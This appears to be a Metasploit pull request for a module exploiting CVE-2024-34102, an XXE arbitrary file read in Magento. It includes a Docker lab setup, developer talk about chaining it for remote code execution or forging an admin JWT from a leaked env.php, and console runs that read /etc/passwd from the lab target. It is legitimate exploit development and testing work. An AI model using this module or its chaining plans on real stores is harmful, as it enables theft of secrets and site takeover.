WIP - added module for CVE-2024-34102
Placeholder for the module for CVE-2024-34102.
Vulnerable Application
docker-compose.yml
version: '2'
services:
  mariadb:
    image: docker.io/bitnami/mariadb:10.6
    environment:
      # ALLOW_EMPTY_PASSWORD is recommended only for development.
      - ALLOW_EMPTY_PASSWORD=yes
      - MARIADB_USER=bn_magento
      - MARIADB_DATABASE=bitnami_magento
    volumes:
      - 'mariadb_data:/bitnami/mariadb'
  magento:
    image: docker.io/bitnami/magento:2
    ports:
      - '80:8080'
      - '443:8443'
    environment:
      - MAGENTO_HOST=localhost
      - MAGENTO_DATABASE_HOST=mariadb
      - MAGENTO_DATABASE_PORT_NUMBER=3306
      - MAGENTO_DATABASE_USER=bn_magento
      - MAGENTO_DATABASE_NAME=bitnami_magento
      - ELASTICSEARCH_HOST=elasticsearch
      - ELASTICSEARCH_PORT_NUMBER=9200
      # ALLOW_EMPTY_PASSWORD is recommended only for development.
      - ALLOW_EMPTY_PASSWORD=yes
    volumes:
      - 'magento_data:/bitnami/magento'
    depends_on:
      - mariadb
      - elasticsearch
  elasticsearch:
    image: docker.io/bitnami/elasticsearch:7
    volumes:
      - 'elasticsearch_data:/bitnami/elasticsearch/data'
volumes:
  mariadb_data:
    driver: local
  magento_data:
    driver: local
  elasticsearch_data:
    driver: local
Software versions
root@6cedd6f9eae9:~# php /bitnami/magento/bin/magento --version
Magento CLI 2.4.7
root@6cedd6f9eae9:~#
root@6cedd6f9eae9:~# /lib/x86_64-linux-gnu/libc.so.6
GNU C Library (Debian GLIBC 2.36-9+deb12u7) stable release version 2.36.
Copyright (C) 2022 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.
There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A
PARTICULAR PURPOSE.
Compiled by GNU CC version 12.2.0.
libc ABIs: UNIQUE IFUNC ABSOLUTE
Minimum supported kernel: 3.2.0
For bug reporting instructions, please see:
<http://www.debian.org/Bugs/>.
root@6cedd6f9eae9:~#
Hey @heyder! Thanks for showing interest in this module! Apologies for the overlap - I also have a working module to exploit CVE-2024-34102 (I was tracking it with this issue https://github.com/rapid7/metasploit-framework/issues/19290).
I was just beginning to look into how we might be able to chain it with CVE-2024-2961 in order to obtain RCE. Were you also thinking of attempting to chain those together? If so, and if you're at all interested maybe we could collaborate as I'll be off working on module development until July 22nd after today - no pressure though.
Hey @jheysel-r7! In the last few days, I struggled to get it chained with CVE-2024-2961 by putting some pieces together, but I still haven't made real progress in obtaining RCE. So, yes, if you would like, I would be more than happy to get help and invest more time in this direction.
However, if we don't progress, we still have plan B: leaking the env.php file and giving the module's user admin rights in the application by signing a JWT.
Sounds like a great plan. It's probably best if we just continue with this module as is. In the event I can get RCE working and the exploit for CVE-2024-2961 is as robust as the blog post says it is, it might make sense to write a mixin for CVE-2024-2961 where you can override the functions send and download for the specific exploit.
I'll let you know how it goes and if I get it working I'd be happy to do the necessary refactoring.
@jheysel-r7 I haven't had time to look into that last week, so I think it's worth moving forward with this module in its simplest version. I'll come back to it and do the refactoring in the near future.
When SRVHOST isn't correctly defined.
msf6 auxiliary(gather/magento_xxe_cve_2024_34102) > set SRVHOST 0.0.0.0
SRVHOST => 0.0.0.0
msf6 auxiliary(gather/magento_xxe_cve_2024_34102) > run
[*] Running module against 127.0.0.1
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Detected Magento Community edition version 2.4 which is vulnerable
[-] Auxiliary aborted due to failure: bad-config: SRVHOST must be set to an IP address (0.0.0.0 is invalid) for exploitation to be successful
[*] Auxiliary module execution completed
When TARGETFILE doesn't exist.
msf6 auxiliary(gather/magento_xxe_cve_2024_34102) > set TARGETFILE /etc/nonexist
TARGETFILE => /etc/nonexist
msf6 auxiliary(gather/magento_xxe_cve_2024_34102) > run
[*] Running module against 127.0.0.1
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Detected Magento Community edition version 2.4 which is vulnerable
[*] Using URL: http://192.168.128.1:8080/
[-] Auxiliary aborted due to failure: unexpected-reply: Server returned unexpected response: 500
[*] Server stopped.
[*] Auxiliary module execution completed
msf6 auxiliary(gather/magento_xxe_cve_2024_34102) >
When everything is properly configured.
msf6 auxiliary(gather/magento_xxe_cve_2024_34102) > set TARGETFILE /etc/passwd
TARGETFILE => /etc/passwd
msf6 auxiliary(gather/magento_xxe_cve_2024_34102) > run
[*] Running module against 127.0.0.1
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Detected Magento Community edition version 2.4 which is vulnerable
[*] Using URL: http://192.168.128.1:8080/
[+] File read succeeded!
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
[*] Server stopped.
[*] Auxiliary module execution completed
Release Notes
This adds an auxiliary module for an XXE which results in an arbitrary file read in Magento, which is being tracked as CVE-2024-34102.